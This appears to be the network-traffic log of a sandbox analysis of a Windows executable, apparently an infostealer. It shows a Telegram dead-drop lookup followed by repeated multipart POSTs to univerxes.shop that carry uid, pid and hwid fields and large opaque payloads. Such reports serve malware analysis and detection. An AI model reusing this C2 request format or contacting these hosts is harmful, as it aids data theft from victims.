                                                                                                                                                                                                        2025-03-11 16:29:06 UTC12363INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 7a 5f 70 72 6f 6b 6c 61 32 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @kz_prokla2</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.549710172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:09 UTC264OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 65
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:09 UTC65OUTData Raw: 75 69 64 3d 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 26 63 69 64 3d
                                                                                                                                                                                                        Data Ascii: uid=f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22&cid=
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC790INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:10 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 14134
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QY51yGH%2FeWBq9nXp9h4vlh64UWRwl137OJn9n2S0EbLIGkIASlIPclsLV0eMR%2FdlpnX8zWMyPQp5NFd6VXx%2B%2FXIf6lenIyaMsnnSph0pA5%2F2XYqlewawMsG7pDUcmM5QA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 91ec6dd868e06195-ORD
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=52697&min_rtt=52667&rtt_var=14837&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=965&delivery_rate=54978&cwnd=32&unsent_bytes=0&cid=f73852f6a6d9261d&ts=1042&x=0"
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC579INData Raw: 29 b8 1d ea 62 07 7f 2e 18 c6 f7 6f 26 de ac 0c 28 76 b6 76 ea 45 61 b5 9a 45 ab fc a2 b0 dd 08 e4 63 b6 4e b7 8c 8c 6a 16 12 25 34 d5 d8 54 e5 79 e5 f0 83 11 4b 43 e5 a5 1a 8c 5b 0a 9f 11 fa f4 fc a1 96 67 33 21 28 2f 2d 62 dc f2 d3 2b b4 41 6c 99 e9 3b 75 ad 4c 3a 8c cd 34 42 6a aa 7e 7a 93 1f 83 58 6c 34 ee 21 af 8f 77 cd 0f 9d 1e 1d bb 5b 3a 13 06 ac f0 57 5f bd ac 66 10 9e b0 6a 15 2f 4a 9d 43 e3 2b ef 4d c2 e7 f4 f0 68 fa 42 56 d1 97 ce ba f2 f4 a4 e5 00 9e e6 29 7f d2 f0 34 ab f1 5e 13 bd 0d 51 4c 27 3c c6 ef 5a 35 33 c1 4f 3e 15 c5 20 4a 63 a8 f6 b9 bb 26 19 e5 54 53 c4 4a e1 1a 1d c0 c4 91 61 20 16 7f e0 8d 9b f4 6a dd 41 7c f0 6e 60 12 51 dd 0c 69 54 72 26 33 ed a7 4e a0 0b bb 27 c0 01 bb 83 25 1d db a5 d2 d2 84 73 f6 3b bf 61 df bf 9d 00 58 4a
                                                                                                                                                                                                        Data Ascii: )b.o&(vvEaEcNj%4TyKC[g3!(/-b+Al;uL:4Bj~zXl4!w[:W_fj/JC+MhBV)4^QL'<Z53O> Jc&TSJa jA|n`QiTr&3N'%s;aXJ
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: 4f 6f e2 cd 1a 4e d8 a7 03 29 1c ac 80 4f 65 97 9b d6 42 ba f7 6a 13 ca 6f 02 43 93 99 cf b4 d6 ea 50 2c 16 39 0d 36 25 d0 14 ff fa 2e db af a7 ac 99 22 8e 7b 4f 79 70 90 a5 7f 41 f2 8d 6d fd 73 0a d0 46 98 c8 a1 57 13 fa 4f a3 4e ec 56 4f 70 8a 13 8a 8a 6a ee a3 8c 5f f4 7f 1b f3 d8 a2 44 f5 26 e2 c3 3b 31 e2 10 1d 50 ed 49 bb be 11 54 95 79 3c 87 c2 d8 4c 30 ab 99 d9 14 ed 94 96 b0 fb 19 e4 59 5a db f1 80 d3 ac 6c 18 78 88 6e de 2a 4d 82 4a 11 0e fa 40 60 40 27 0b 3f fa 1c b2 a0 b2 7f e3 eb 0f b2 ca 34 89 93 2a cc cf 4a e8 36 31 42 24 0c eb 50 96 9a 1e 85 c7 dc 17 3b e1 86 75 5b fe a0 4c 71 52 ca d5 01 d9 99 2e e2 d7 db 4d 25 ea a6 05 42 c6 e9 55 b5 c1 44 c8 f8 2a 33 d8 0e 5e 10 2a f3 85 a0 ca 5c c2 33 5d 27 b7 80 11 5e e1 f8 94 4e 49 52 4a 64 d6 d2 aa
                                                                                                                                                                                                        Data Ascii: OoN)OeBjoCP,96%."{OypAmsFWONVOpj_D&;1PITy<L0YZlxn*MJ@`@'?4*J61B$P;u[LqR.M%BUD*3^*\3]'^NIRJd
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: cf 19 72 0e 7b a7 75 48 db c1 2a e2 e0 03 ee 0d ca d2 8d 69 8c 49 3e 51 cd 8c 78 27 5a b8 3c 5b 17 f8 bc ea 93 0f be 39 8e 6b 72 97 1d 3a 4b 65 ed 19 b3 04 79 81 bc 86 32 93 f6 3b f3 ce 19 95 45 90 53 69 d4 f0 e2 17 71 82 e2 44 ef 05 3f 30 92 ca 39 67 d8 dc e5 d7 36 a4 ca dc 87 96 79 cc b1 d5 54 b2 c2 2b f5 b0 6e b5 46 67 b7 97 12 33 b7 e1 3b 50 36 da 21 69 55 f5 48 e7 85 b1 15 bd e2 a7 9a e8 03 3e 16 a7 09 47 c0 77 36 48 93 08 96 20 8a 88 8c 52 28 01 13 22 7b c7 d1 77 76 4c d7 e7 85 40 a9 ea 20 ed 96 28 ab 85 cf 3c 69 06 e9 75 b5 89 94 4a 0b 9f e8 4b 51 d9 d5 dd bb 41 28 ec dd 69 f8 b8 a2 ca 29 d1 23 e2 b3 95 2f e2 74 20 41 c6 8a 93 0e 6d fe de 6c 17 f7 27 51 82 e8 b3 90 b6 3f 93 f6 b3 fb b3 cb 7a 31 23 a7 9d af bc 49 3c 8d b5 f6 9a 5c 54 ea 15 7f 04 71
                                                                                                                                                                                                        Data Ascii: r{uH*iI>Qx'Z<[9kr:Key2;ESiqD?09g6yT+nFg3;P6!iUH>Gw6H R("{wvL@ (<iuJKQA(i)#/t Aml'Q?z1#I<\Tq
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: 4d 3c 90 13 cf 85 f2 28 19 29 28 b9 cb c8 aa 8c 1f 21 8b 88 01 23 a7 aa ef bf 3b 80 2a 23 e9 6e 75 46 f2 32 25 35 52 be e3 bb fd 3e 8a ea 12 0d 0e 25 ae a3 7f 2c 4c 68 c6 c6 77 9b 49 b5 c8 0b e3 c0 94 8a e3 6e b5 6f 46 43 3d 1d 15 94 36 05 80 27 e2 9e 3e 49 98 bf 48 0d 50 99 f9 fa c2 01 a1 69 c8 a8 df 3f 63 af e1 6c a1 aa 4f 01 ef 57 44 dc 62 0e e5 af ff 6c ac cd 2e 8e 1b 18 25 09 33 91 e4 76 22 42 fc ec 03 f8 a6 dc 77 85 31 09 27 d3 39 4f 05 64 41 d0 b2 5e 1d dd 49 5c 28 24 c0 29 78 a0 2b 6f 8f 4c d8 b1 e2 1a 54 4f 41 93 52 ef b3 6e 9e 16 b2 8f d0 47 d3 24 f0 cd 6d 00 de e2 67 5a 26 c0 99 f0 5b 6b 72 68 5e 9a a8 fe b3 24 27 8b 02 68 1a 73 7c dc db 81 cb 7a 80 64 54 4e f2 8b d7 9e a4 26 f6 ef 62 c5 48 21 56 33 2d 92 de 1c 7b 22 81 ed f7 82 d5 ce 2d da 5a
                                                                                                                                                                                                        Data Ascii: M<()(!#;*#nuF2%5R>%,LhwInoFC=6'>IHPi?clOWDbl.%3v"Bw1'9OdA^I\($)x+oLTOARnG$mgZ&[krh^$'hs|zdTN&bH!V3-{"-Z
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: 8a 11 14 da 2a cc 08 33 d8 61 38 a2 19 c8 24 62 80 95 28 4f c4 b0 0f f4 4e d0 5e 60 ff 12 7c 21 5b fb 4d 18 ac bf b9 14 7a 93 ca 82 a2 fa be 12 14 5d c0 f3 a6 7c a5 d1 66 c2 9c d8 83 a0 0d c9 13 24 e1 ec ef bf 98 1c 8d 92 cd 8a 5d 3b f2 a1 73 39 e3 fb 90 b8 8a ba 42 0a 1c 30 fc fa cd 48 bc 9b b6 7d 49 fe e8 63 9c 87 65 c1 24 4c a7 08 05 86 93 21 c2 1e eb a2 7e 46 b0 60 36 63 0b e8 fe 81 ff d8 7c 03 da b5 49 87 2c ba 40 45 82 98 30 cf dd 1d 8e f9 85 b7 1a 35 0a 47 50 a8 f4 d7 ac 74 e5 59 43 14 e6 ba c2 16 af 59 68 e5 1b 55 9d 0a 9b cb 85 7d fe c4 cb be 01 b0 59 7b e1 41 f0 29 31 78 61 78 ec ab 70 0f 41 24 e6 50 5c 7d 3c c7 08 e0 f9 e0 ac c9 c6 22 46 bf a4 c0 6e e4 62 46 aa 5c ff 76 d8 67 98 a5 80 2e ce a3 b2 4a fb 48 5f 75 c1 31 ce af 23 08 06 7f db ca ec
                                                                                                                                                                                                        Data Ascii: *3a8$b(ON^`|![Mz]|f$];s9B0H}Ice$L!~F`6c|I,@E05GPtYCYhU}Y{A)1xaxpA$P\}<"FnbF\vg.JH_u1#
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: a7 91 e3 10 c3 74 25 b2 e7 06 a0 1f 7a 23 b6 5e 65 50 2b c0 0e 8c 06 c4 68 df 97 40 aa 24 1c 5a 31 2a a0 78 b7 2f ce 81 a4 e9 b3 83 c7 9d 1d 0f 8e 4d 30 d7 a9 62 74 f6 47 f5 19 9a c5 0c ce 5a bf 92 e7 7e 09 6e 38 db 55 cc 51 53 a0 71 b6 c9 75 33 ee d0 1c 8a f1 7f cd 50 54 24 28 8a 1d 3d be 33 36 ec b7 e5 e1 09 c3 ab 63 1c 89 5d a4 53 e2 89 93 9e 6e fa a4 ed d5 59 81 61 33 16 4b c9 b4 b5 4d a3 eb c6 dc 02 16 cd 9a 45 f9 e3 03 db c0 03 09 e4 b7 58 b5 fb 9c e1 f5 ca c9 4b b3 93 b4 9d 50 5d f4 8b 31 89 94 43 57 c3 33 9f b9 2f b4 79 f8 f9 c3 ed 8b 63 aa 36 6f 6d e6 e1 81 9e 1f 2f 89 3c 56 01 7e 8d 49 2f c9 20 e1 c9 15 bd 21 2f 96 78 8f b1 03 69 00 20 c4 54 fc fe 71 72 a1 66 77 e5 5f f3 3b a7 21 15 b6 cc a6 41 9d 3f ad f6 bc 32 ca 5f 66 25 86 9e 1f dd 7e 4d 38
                                                                                                                                                                                                        Data Ascii: t%z#^eP+h@$Z1*x/M0btGZ~n8UQSqu3PT$(=36c]SnYa3KMEXKP]1CW3/yc6om/<V~I/ !/xi Tqrfw_;!A?2_f%~M8
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: be 93 07 c4 bf 31 86 40 79 dd 6d df 09 ce f0 36 7f 10 22 4a 55 0a 62 bc e6 c2 8e ff 44 69 5e 6a b5 d6 f0 0e 77 be 5f 8d 46 a6 87 d5 fd a0 f9 d9 03 26 c1 eb 63 31 f9 e4 ff 14 26 80 97 33 76 ae 99 35 a9 bb 98 c9 77 16 1f 71 b3 4d 03 26 89 03 3b 18 66 3f d0 a7 f9 22 70 2e b2 ab 49 56 ec f3 b7 fc d7 12 1c c4 eb b4 d1 b2 d7 09 01 63 bf 8f 10 39 cf 4c 4b dc 92 03 92 ef 02 4a eb e3 9a 37 d3 e2 c2 28 c2 69 fb e4 60 f1 1f 69 60 09 8b 05 e0 cd 65 45 f2 ce 36 6c 16 7f 90 cd 11 27 b4 8e ac 07 8c 52 ae 2b 39 28 d2 db 3f 75 18 9b 4c fd 4d 0f 0f 7a 01 f0 ff 5e 28 e7 72 0e 40 a6 0e d2 b7 71 c8 c9 a8 81 4f 1d cc 41 84 3d e6 a3 06 94 de 65 1f 5e 08 52 df b9 5e 03 91 f8 cb 5d 29 c7 f2 85 c1 a6 01 23 63 eb 1f 94 ee 54 b3 c7 3c 50 ec 59 6e 0b 0d f3 d8 d1 38 2e ca df 28 ef 23
                                                                                                                                                                                                        Data Ascii: 1@ym6"JUbDi^jw_F&c1&3v5wqM&;f?"p.IVc9LKJ7(i`i`eE6l'R+9(?uLMz^(r@qOA=e^R^])#cT<PYn8.(#
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: b0 99 6d 56 3d 89 49 49 ec 93 e4 4b 09 ba 75 16 f1 37 e1 87 0a 36 15 96 61 8b d3 97 9d 88 ae 48 29 de c1 0c b6 c7 8c df 03 19 2a f7 b5 d8 ef 3c 05 db fc c7 93 35 92 06 25 34 2a 7b 02 f2 6b 37 d2 6a 8d 6d cc 4f a4 22 87 ac 8a bb 27 a8 85 f5 47 eb 3d 72 7f 82 31 a5 29 97 b6 15 a3 59 c0 7f b6 15 1b 6b 66 4a 15 3b d8 ab 58 b9 9a 83 a0 20 19 68 86 66 db 0f 4a e5 80 69 6d 7b c7 df 0c d9 71 64 8b 31 23 ea 41 92 38 38 a1 c8 44 9c 43 0c c6 5f ef 77 2e 2a b7 53 3b f6 e6 cd 8f 99 93 8d 5c 15 0e 82 56 49 3b 36 72 db 5e f2 9e 24 fc 41 88 8d f9 5d c0 1a d2 62 7c c6 4c a7 ef 0d 1a bf 55 c7 09 f8 53 87 99 76 d4 b1 e9 8a 40 d9 45 c9 0e 43 48 67 62 03 fd bf c2 e9 88 77 93 5f a4 ba 86 ce 74 60 83 b0 0d 84 c0 c3 be 0f 0d 46 34 0a 36 a2 84 7d e4 08 b2 90 e6 97 35 75 2e 61 13
                                                                                                                                                                                                        Data Ascii: mV=IIKu76aH)*<5%4*{k7jmO"'G=r1)YkfJ;X hfJim{qd1#A88DC_w.*S;\VI;6r^$A]b|LUSv@ECHgbw_t`F46}5u.a
                                                                                                                                                                                                        2025-03-11 16:29:10 UTC1369INData Raw: b4 3d 82 66 3f c6 81 aa 08 2c 80 78 47 bc d5 11 4e d1 f8 65 d5 2d ba 8c b5 c8 ab 67 e2 87 30 9e b1 2c ff a2 f2 65 e9 b9 a6 4f 10 d0 18 bd b4 4d 33 ff 24 fe 02 8e fc a8 21 db 5a d2 d4 85 35 8f bd d2 35 de b1 b6 45 da 6c 17 58 55 e8 4e 6e f7 1d e1 e4 ea 98 c7 bf c9 9f 87 9c d9 ee d6 2a 57 5b a9 db 84 4f 22 e2 ba 19 7d 3a fd ec 87 f5 b7 de 49 51 22 3b c0 32 de 36 b2 f6 35 8f e5 37 9e 7e 35 48 50 72 b7 85 ac dd 1e f0 6d f8 49 29 03 4c f7 29 ab 45 25 4a f1 b7 79 3a 8f 57 cb 5a 4f 5a ae 96 f9 c5 54 89 a0 17 71 3f a1 d0 e8 2c b5 bc af 90 82 6c 11 18 4f fc d0 e4 d2 9c 99 11 6a e8 50 55 33 ca 52 7e 5f f7 66 af bb dd 86 ce 96 29 d6 98 6a 76 34 3f a3 77 a3 93 0a 38 96 cd 12 3e dd 6e 27 20 5c 0f 45 81 c8 5b 57 09 29 69 83 49 b6 37 6c 27 d7 a5 ef 6d 0f 80 59 5f 5e 25
                                                                                                                                                                                                        Data Ascii: =f?,xGNe-g0,eOM3$!Z55ElXUNn*W[O"}:IQ";2657~5HPrmI)L)E%Jy:WZOZTq?,lOjPU3R~_f)jv4?w8>n' \E[W)iI7l'mY_^%


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.549711172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:14 UTC278OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=75lRdx7wLp1tS9
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 14917
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:14 UTC14917OUTData Raw: 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 35 6c 52 64 78 37 77 4c 70 31 74 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45
                                                                                                                                                                                                        Data Ascii: --75lRdx7wLp1tS9Content-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--75lRdx7wLp1tS9Content-Disposition: form-data; name="pid"2--75lRdx7wLp1tS9Content-Disposition: form-data; name="hwid"E
                                                                                                                                                                                                        2025-03-11 16:29:15 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:15 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUTh9rgnUyg%2Frc49bVU4ZOGY%2FVA2aQLPaYuqZG5STLPzE%2Ff2imi7AT4KtZlmXFljva71yGrobiul3nlGIOEODfnIPvwmsQkV96qctJ59BwwXZ8JapDcq8jPRUC2yZ%2BwNMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 91ec6df7da6761c0-ORD
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=51903&min_rtt=51894&rtt_var=14611&sent=7&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15853&delivery_rate=55760&cwnd=32&unsent_bytes=0&cid=311500d8c6cce71a&ts=1255&x=0"
                                                                                                                                                                                                        2025-03-11 16:29:15 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 34 32 2e 31 36 36 2e 32 38 22 7d 7d 0d 0a
                                                                                                                                                                                                        Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}
                                                                                                                                                                                                        2025-03-11 16:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.549712172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:18 UTC273OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=fI28nppP3
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 15041
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:18 UTC15041OUTData Raw: 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 49 32 38 6e 70 70 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 32 38 44 44 34 30 41 36 38 43 44 44 35 35
                                                                                                                                                                                                        Data Ascii: --fI28nppP3Content-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--fI28nppP3Content-Disposition: form-data; name="pid"2--fI28nppP3Content-Disposition: form-data; name="hwid"E028DD40A68CDD55
                                                                                                                                                                                                        2025-03-11 16:29:19 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:18 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZ03co6%2Ftw2Xm6tLaOcQtp5YyXYRBxzfFYqvkin1ozkEW6Cya%2F0tTcbUeiVnUB1DTNorxtPojcPfVuouFEOzmDZ2uMPs%2B1lwOT72rB1gk%2B65Kf9wM0MD2h9Re4X9vFAwDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 91ec6e0e5c7609fe-MIA
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=25505&min_rtt=24844&rtt_var=8133&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15972&delivery_rate=104669&cwnd=205&unsent_bytes=0&cid=7d31b419603a762e&ts=1049&x=0"
                                                                                                                                                                                                        2025-03-11 16:29:19 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 34 32 2e 31 36 36 2e 32 38 22 7d 7d 0d 0a
                                                                                                                                                                                                        Data Ascii: 45{"success":{"message":"message success delivery from 76.242.166.28"}}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.549713172.67.213.1714438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:22 UTC276OUTPOST /SwnNW HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=q2478UI0qTxb
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 20545
                                                                                                                                                                                                        Host: univerxes.shop
                                                                                                                                                                                                        2025-03-11 16:29:22 UTC15331OUTData Raw: 2d 2d 71 32 34 37 38 55 49 30 71 54 78 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 32 37 34 65 33 39 64 38 65 39 61 33 61 61 63 39 64 36 30 38 33 38 31 62 30 39 37 30 30 31 64 61 33 39 61 38 39 66 38 36 39 64 36 64 35 32 65 63 66 37 32 32 65 32 32 0d 0a 2d 2d 71 32 34 37 38 55 49 30 71 54 78 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 71 32 34 37 38 55 49 30 71 54 78 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 32 38 44 44 34
                                                                                                                                                                                                        Data Ascii: --q2478UI0qTxbContent-Disposition: form-data; name="uid"f274e39d8e9a3aac9d608381b097001da39a89f869d6d52ecf722e22--q2478UI0qTxbContent-Disposition: form-data; name="pid"3--q2478UI0qTxbContent-Disposition: form-data; name="hwid"E028DD4
